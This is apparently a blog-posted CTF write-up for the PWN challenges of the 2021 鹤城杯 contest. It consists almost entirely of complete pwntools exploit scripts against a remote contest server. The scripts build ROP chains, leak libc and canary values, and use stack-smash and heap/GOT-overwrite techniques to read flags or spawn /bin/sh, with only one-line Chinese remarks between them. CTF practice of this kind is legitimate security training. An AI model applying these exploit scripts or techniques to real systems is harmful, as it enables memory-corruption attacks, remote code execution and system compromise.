2021-鹤城杯wp-PWN

onecho

控memcpy参数,把ROP链读到bss段,ROP链构造orw,注意清栈

from pwn import *
from pwn import p64, u64, p32, u32, p8

context.arch = 'i386'
context.log_level = 'debug'
context.terminal = ['tmux', 'sp', '-h']

elf = ELF('./onecho')
# libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
# libc = ELF('/usr/lib/i386-linux-gnu/libc-2.31.so')
libc = ELF('./libc.so.6')

# io = process('./onecho')
io = remote('182.116.62.85','24143')
putsPLT = elf.plt['puts']
putsGOT = elf.got['puts']
main = 0x0804973F
bss = 0x0804C008+0x500
pebx = 0x08049022  # : pop ebx ; ret
pedi =0x08049812 #: pop edi ; pop ebp ; ret
pppr = 0x08049811 #: pop esi ; pop edi ; pop ebp ; ret

def exp():
    io.recvuntil('name:')
    chain = p32(putsPLT) + p32(main) + p32(putsGOT)

    payload = chain.ljust(0x110,b'a')+p32(pedi)+p32(bss)+p32(0x10)+p32(putsPLT)+p32(main)+p32(putsGOT)

    io.sendline(payload)
    io.recvuntil('[?] Error?\n')
    leak = u32(io.recv(4))
    info(hex(leak))

    libc_base = leak - libc.sym['puts']
    o = libc_base+libc.sym['open']
    r = libc_base + libc.sym['read']
    w = libc_base + libc.sym['write']
    fwrite = libc_base + libc.sym['fwrite']
    fread = libc_base  + libc.sym['fread']

    info(hex(libc_base))
    info(hex(o))
    info(hex(r))
    info(hex(w))

    chain = b'flag\x00'
    payload = chain.ljust(0x110,b'a')+p32(pedi)+p32(bss)+p32(0x10)
    payload += p32(o)+p32(pedi)+p32(bss) +p32(0)
    payload += p32(r)+p32(pppr)+p32(3)+p32(bss+0x100)+p32(0x70)
    payload += p32(w)+p32(main)+p32(1)+p32(bss+0x100)+p32(0x70)
    # gdb.attach(io)
    io.sendline(payload)

exp()

io.interactive()

babyof

from pwn import *
from pwn import p64,u64,p32,u32,p8

context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux','sp','-h']

elf = ELF('./babyof')
# libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')

libc = ELF('./libc-2.27.so')

# io = process('./babyof')
io = remote('182.116.62.85','21613')

prdi = 0x0000000000400743#: pop rdi
prsi = 0x0000000000400741 #: pop rsi ; pop r15 ; ret
prdx = 0x0000000000001b96 #: pop rdx ; ret

def exp():
    # io.recvuntil('Do you know how to do buffer overflow?')
    payload = b'a'*0x48 + p64(prdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(0x40066B)
    io.send(payload)

    leak = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
    info(hex(leak))
    libc_base = leak - libc.sym['puts']
    system = libc_base + libc.sym['system']
    info(hex(system))
    binsh = libc_base  + next(libc.search(b'/bin/sh\x00'))
    pop_rdx = libc_base + prdx

    # io.recvuntil('Do you know how to do buffer overflow?')
    payload = b'a'*0x48 +p64(pop_rdx)+p64(0)+p64(prsi)+p64(0)*2 +p64(prdi) + p64(binsh) + p64(system)
    # gdb.attach(io)
    io.send(payload)

exp()

io.interactive()

easycho

输入backdoor把flag读到内存,利用stack smash打印flag

from pwn import *
from pwn import p64, u64, p32, u32, p8

context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux', 'sp', '-h']

# elf = ELF('./easyecho')
# libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
# libc = ELF('')

# io = process('./easyecho')
io = remote('182.116.62.85', '24842')

def exp():
    io.recvuntil('Name:')
    io.sendline('a'*0x10)
    io.recvuntil('a'*0x10)
    leak = u64(io.recv(6).ljust(8, b'\x00'))
    elf_base = leak - 0xcf0
    flag_addr = elf_base + 0x202040
    info(hex(elf_base))
    info(hex(flag_addr))

    io.sendlineafter('Input:', 'backdoor')
    io.recvuntil('Input:')
    # gdb.attach(io)
    io.sendline(cyclic(0x88+0xe0)+p64(flag_addr))
    io.sendlineafter('Input:', 'exitexit')

exp()

io.interactive()

PWN 1

原题supermarket,网上抄的exp直接可以打通

#coding:utf-8
from pwn import *
from pwn import u32,p32

context.log_level = 'debug'
debug = 0

if debug == 1:
    r = process('./supermarket')
    # gdb.attach(r)
else:
    # r = remote('111.198.29.45', 56608)
    r = remote('182.116.62.85','27518')

def add(name, price, descrip_size, description):
    r.recvuntil('your choice>> ')
    r.send('1\n')

    r.recvuntil('name:')
    r.send(name + '\n')

    r.recvuntil('price:')
    r.send(str(price) + '\n')

    r.recvuntil('descrip_size:')
    r.send(str(descrip_size) + '\n')

    r.recvuntil('description:')
    r.send(str(description) + '\n')

def dele(name):
    r.recvuntil('your choice>> ')
    r.send('2\n')

    r.recvuntil('name:')
    r.send(name + '\n')

def lis():
    r.recvuntil('your choice>> ')
    r.send('3\n')
    r.recvuntil('all  commodities info list below:\n')
    return r.recvuntil('\n---------menu---------')[:-len('\n---------menu---------')]

def changePrice(name, price):
    r.recvuntil('your choice>> ')
    r.send('4\n')

    r.recvuntil('name:')
    r.send(name + '\n')

    r.recvuntil('input the value you want to cut or rise in:')
    r.send(str(price) + '\n')

def changeDes(name, descrip_size, description):
    r.recvuntil('your choice>> ')
    r.send('5\n')

    r.recvuntil('name:')
    r.send(name + '\n')

    r.recvuntil('descrip_size:')
    r.send(str(descrip_size) + '\n')

    r.recvuntil('description:')
    r.send(description + b'\n')

def exit():
    r.recvuntil('your choice>> ')
    r.send('6\n')

add('1', 10, 8, 'a')
add('2', 10, 0x98, 'a')
add('3', 10, 4, 'a')
changeDes('2', 0x100, b'a')
add('4', 10, 4, 'a')

def leak_one(address):
    changeDes('2', 0x98, b'4' + b'\x00' * 0xf + p32(2) + p32(0x8) + p32(address))
    res = str(lis().decode('ISO-8859-1')).split('des.')[-1]
    if(res == '\n'):
        return '\x00'
    return res[0]

def leak(address):
    content = leak_one(address) + leak_one(address + 1) + leak_one(address + 2) + leak_one(address + 3)
    log.info('%#x => %#x' % (address, u32(content)))
    return content.encode('ISO-8859-1')

d = DynELF(leak, elf=ELF('./task_supermarket'))
system_addr = d.lookup('system', 'libc')
log.info('system \'s address = %#x' % (system_addr))
bin_addr = 0x0804B0B8
changeDes('1', 0x8, b'/bin/sh\x00')
changeDes('2', 0x98, b'4' + b'\x00' * 0xf + p32(2) + p32(0x8) + p32(0x0804B018))
changeDes('4', 8, p32(system_addr))
dele('1')

r.interactive()

littleof

from pwn import *
from pwn import p64,u64,p32,u32,p8

context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux','sp','-h']

elf = ELF('./littleof')
# libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
# libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
libc = ELF('./libc-2.27.so')

# io = process('./littleof')
io = remote('182.116.62.85','27056')
prdi = 0x0000000000400863#: pop rdi; ret;
prsi = 0x0000000000400861#: pop rsi; pop r15; ret;
prdx = 0x0000000000001b96 #: pop rdx ; ret 
putsPLT = elf.plt['puts']
putsGOT = elf.got['puts']
main = 0x0000000000400789

def exp():
    io.recvuntil('Do you know how to do buffer overflow?')
    payload = 'a'*(57+16)
    
    io.send(payload)
    io.recvuntil('a'*(57+16))
    canary = u64(io.recv(7).rjust(8,b'\x00'))
    info(hex(canary))
    payload = b'a'*0x48+p64(canary)*2+p64(prdi) + p64(putsGOT) + p64(putsPLT)+p64(main)
    io.sendlineafter('Try harder!',payload)
    leak = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
    info(hex(leak))
    libc_base = leak - libc.sym['puts']
    system = libc_base + libc.sym['system']
    binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
    info(hex(libc_base))
    info(hex(system))
    info(hex(binsh))

    io.recvuntil('Do you know how to do buffer overflow?')
    io.sendline('A'*8)
    rdx = libc_base + prdx
    payload = b'a'*0x48+p64(canary)+p64(prdi)*2 + p64(binsh)+p64(rdx)+p64(0)+p64(prsi)+p64(0)*2 + p64(system)+p64(main)
    # gdb.attach(io)
    io.sendlineafter('Try harder!',payload)

exp()

io.interactive()

总结

题目比较水,也算是ak了

posted @ 2021-10-13 23:00  unr4v31  阅读(128)  评论(0编辑  收藏  举报